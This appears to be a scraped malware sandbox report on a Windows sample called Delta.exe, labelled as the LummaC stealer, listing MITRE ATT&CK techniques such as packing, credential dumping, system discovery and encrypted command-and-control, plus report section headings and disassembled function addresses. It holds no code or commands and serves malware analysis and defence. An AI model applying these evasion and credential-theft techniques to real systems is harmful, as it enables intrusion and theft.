Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Delta.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
Delta.exe

Function 0061019E Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Function 005E1C10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108
libraryfileloaderCOMMON

Function 005F6642 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 005E20C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33
libraryloaderCOMMON

Function 005F6E2A Relevance: 7.7, APIs: 5, Instructions: 197
COMMON

Function 005E1DB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78
librarymemoryloaderCOMMON

Function 005EF293 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Function 005FD3A4 Relevance: 3.2, APIs: 2, Instructions: 196
fileCOMMONLIBRARYCODE

Function 005F72A8 Relevance: 3.2, APIs: 2, Instructions: 177
COMMON

Function 005FDB7D Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Function 005F7192 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 005E2010 Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Function 005F64F3 Relevance: 3.0, APIs: 2, Instructions: 34
COMMONLIBRARYCODE

Function 005F56B7 Relevance: 3.0, APIs: 2, Instructions: 22
memoryCOMMONLIBRARYCODE

Function 005E14C0 Relevance: 1.8, APIs: 1, Instructions: 308
COMMON

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre